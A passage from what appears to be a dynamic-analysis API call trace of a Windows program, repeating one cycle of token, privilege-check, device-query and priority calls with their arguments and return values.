returned 0xfffffffe [0085.039] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.039] GetLastError () returned 0x3f0 [0085.039] GetCurrentProcess () returned 0xffffffff [0085.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.039] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.040] SetLastError (dwErrCode=0x522) [0085.040] CloseHandle (hObject=0x114) returned 1 [0085.040] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.040] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.040] GetLastError () returned 0x578 [0085.040] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.040] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.040] GetCurrentThread () returned 0xfffffffe [0085.040] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.040] GetLastError () returned 0x3f0 [0085.040] GetCurrentProcess () returned 0xffffffff [0085.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.040] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.040] SetLastError (dwErrCode=0x522) [0085.040] CloseHandle (hObject=0x114) returned 1 [0085.040] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.040] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.040] GetLastError () returned 0x578 [0085.040] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.040] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.040] GetCurrentThread () returned 0xfffffffe [0085.040] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.040] GetLastError () returned 0x3f0 [0085.040] GetCurrentProcess () returned 0xffffffff [0085.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.040] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.040] SetLastError (dwErrCode=0x522) [0085.040] CloseHandle (hObject=0x114) returned 1 [0085.040] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.040] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.040] GetLastError () returned 0x578 [0085.040] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.040] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.040] GetCurrentThread () returned 0xfffffffe [0085.040] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.040] GetLastError () returned 0x3f0 [0085.040] GetCurrentProcess () returned 0xffffffff [0085.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.040] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.040] SetLastError (dwErrCode=0x522) [0085.040] CloseHandle (hObject=0x114) returned 1 [0085.040] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.040] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.040] GetLastError () returned 0x578 [0085.040] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.040] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.040] GetCurrentThread () returned 0xfffffffe [0085.040] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.040] GetLastError () returned 0x3f0 [0085.041] GetCurrentProcess () returned 0xffffffff [0085.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.041] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.041] SetLastError (dwErrCode=0x522) [0085.041] CloseHandle (hObject=0x114) returned 1 [0085.041] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.041] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.041] GetLastError () returned 0x578 [0085.041] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.041] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.041] GetCurrentThread () returned 0xfffffffe [0085.041] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.041] GetLastError () returned 0x3f0 [0085.041] GetCurrentProcess () returned 0xffffffff [0085.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.041] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.041] SetLastError (dwErrCode=0x522) [0085.041] CloseHandle (hObject=0x114) returned 1 [0085.041] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.041] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.041] GetLastError () returned 0x578 [0085.041] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.041] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.041] GetCurrentThread () returned 0xfffffffe [0085.041] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.041] GetLastError () returned 0x3f0 [0085.041] GetCurrentProcess () returned 0xffffffff [0085.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.041] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.041] SetLastError (dwErrCode=0x522) [0085.041] CloseHandle (hObject=0x114) returned 1 [0085.041] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.041] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.041] GetLastError () returned 0x578 [0085.041] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.041] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.041] GetCurrentThread () returned 0xfffffffe [0085.041] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.041] GetLastError () returned 0x3f0 [0085.041] GetCurrentProcess () returned 0xffffffff [0085.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.041] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.041] SetLastError (dwErrCode=0x522) [0085.041] CloseHandle (hObject=0x114) returned 1 [0085.041] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.041] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.041] GetLastError () returned 0x578 [0085.041] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.041] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.042] GetCurrentThread () returned 0xfffffffe [0085.042] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.042] GetLastError () returned 0x3f0 [0085.042] GetCurrentProcess () returned 0xffffffff [0085.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.042] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.042] SetLastError (dwErrCode=0x522) [0085.042] CloseHandle (hObject=0x114) returned 1 [0085.042] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.042] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.042] GetLastError () returned 0x578 [0085.042] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.042] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.042] GetCurrentThread () returned 0xfffffffe [0085.042] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.042] GetLastError () returned 0x3f0 [0085.042] GetCurrentProcess () returned 0xffffffff [0085.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.042] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.042] SetLastError (dwErrCode=0x522) [0085.042] CloseHandle (hObject=0x114) returned 1 [0085.042] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.042] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.042] GetLastError () returned 0x578 [0085.042] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.042] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.042] GetCurrentThread () returned 0xfffffffe [0085.042] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.042] GetLastError () returned 0x3f0 [0085.042] GetCurrentProcess () returned 0xffffffff [0085.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.042] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.042] SetLastError (dwErrCode=0x522) [0085.042] CloseHandle (hObject=0x114) returned 1 [0085.042] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.042] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.042] GetLastError () returned 0x578 [0085.042] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.042] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.042] GetCurrentThread () returned 0xfffffffe [0085.042] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.042] GetLastError () returned 0x3f0 [0085.042] GetCurrentProcess () returned 0xffffffff [0085.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.042] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.042] SetLastError (dwErrCode=0x522) [0085.042] CloseHandle (hObject=0x114) returned 1 [0085.043] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.043] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.043] GetLastError () returned 0x578 [0085.043] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.043] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.043] GetCurrentThread () returned 0xfffffffe [0085.043] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.043] GetLastError () returned 0x3f0 [0085.043] GetCurrentProcess () returned 0xffffffff [0085.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.043] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.043] SetLastError (dwErrCode=0x522) [0085.043] CloseHandle (hObject=0x114) returned 1 [0085.043] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.043] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.043] GetLastError () returned 0x578 [0085.043] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.043] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.043] GetCurrentThread () returned 0xfffffffe [0085.043] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.043] GetLastError () returned 0x3f0 [0085.043] GetCurrentProcess () returned 0xffffffff [0085.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.043] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.043] SetLastError (dwErrCode=0x522) [0085.043] CloseHandle (hObject=0x114) returned 1 [0085.043] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.043] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.043] GetLastError () returned 0x578 [0085.043] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.043] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.043] GetCurrentThread () returned 0xfffffffe [0085.043] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.043] GetLastError () returned 0x3f0 [0085.043] GetCurrentProcess () returned 0xffffffff [0085.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.043] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.043] SetLastError (dwErrCode=0x522) [0085.043] CloseHandle (hObject=0x114) returned 1 [0085.043] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.043] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.043] GetLastError () returned 0x578 [0085.043] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.043] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.043] GetCurrentThread () returned 0xfffffffe [0085.043] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.043] GetLastError () returned 0x3f0 [0085.043] GetCurrentProcess () returned 0xffffffff [0085.044] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.044] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.044] SetLastError (dwErrCode=0x522) [0085.044] CloseHandle (hObject=0x114) returned 1 [0085.044] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.044] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.044] GetLastError () returned 0x578 [0085.044] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.044] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.044] GetCurrentThread () returned 0xfffffffe [0085.044] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.044] GetLastError () returned 0x3f0 [0085.044] GetCurrentProcess () returned 0xffffffff [0085.044] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.044] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.044] SetLastError (dwErrCode=0x522) [0085.044] CloseHandle (hObject=0x114) returned 1 [0085.044] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.044] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.044] GetLastError () returned 0x578 [0085.044] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.044] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.044] GetCurrentThread () returned 0xfffffffe [0085.044] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.044] GetLastError () returned 0x3f0 [0085.044] GetCurrentProcess () returned 0xffffffff [0085.044] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.044] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.044] SetLastError (dwErrCode=0x522) [0085.044] CloseHandle (hObject=0x114) returned 1 [0085.044] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.044] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.044] GetLastError () returned 0x578 [0085.044] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.044] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.044] GetCurrentThread () returned 0xfffffffe [0085.044] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.044] GetLastError () returned 0x3f0 [0085.044] GetCurrentProcess () returned 0xffffffff [0085.044] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.044] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.044] SetLastError (dwErrCode=0x522) [0085.044] CloseHandle (hObject=0x114) returned 1 [0085.044] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.044] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.044] GetLastError () returned 0x578 [0085.044] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.044] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.045] GetCurrentThread () returned 0xfffffffe [0085.045] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.045] GetLastError () returned 0x3f0 [0085.045] GetCurrentProcess () returned 0xffffffff [0085.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.045] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.045] SetLastError (dwErrCode=0x522) [0085.045] CloseHandle (hObject=0x114) returned 1 [0085.045] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.045] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.045] GetLastError () returned 0x578 [0085.045] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.045] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.045] GetCurrentThread () returned 0xfffffffe [0085.045] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.045] GetLastError () returned 0x3f0 [0085.045] GetCurrentProcess () returned 0xffffffff [0085.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.045] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.045] SetLastError (dwErrCode=0x522) [0085.045] CloseHandle (hObject=0x114) returned 1 [0085.045] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.045] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.045] GetLastError () returned 0x578 [0085.045] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.045] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.045] GetCurrentThread () returned 0xfffffffe [0085.045] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.045] GetLastError () returned 0x3f0 [0085.045] GetCurrentProcess () returned 0xffffffff [0085.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.045] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.045] SetLastError (dwErrCode=0x522) [0085.045] CloseHandle (hObject=0x114) returned 1 [0085.045] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.045] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.045] GetLastError () returned 0x578 [0085.045] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.045] GetPriorityClass 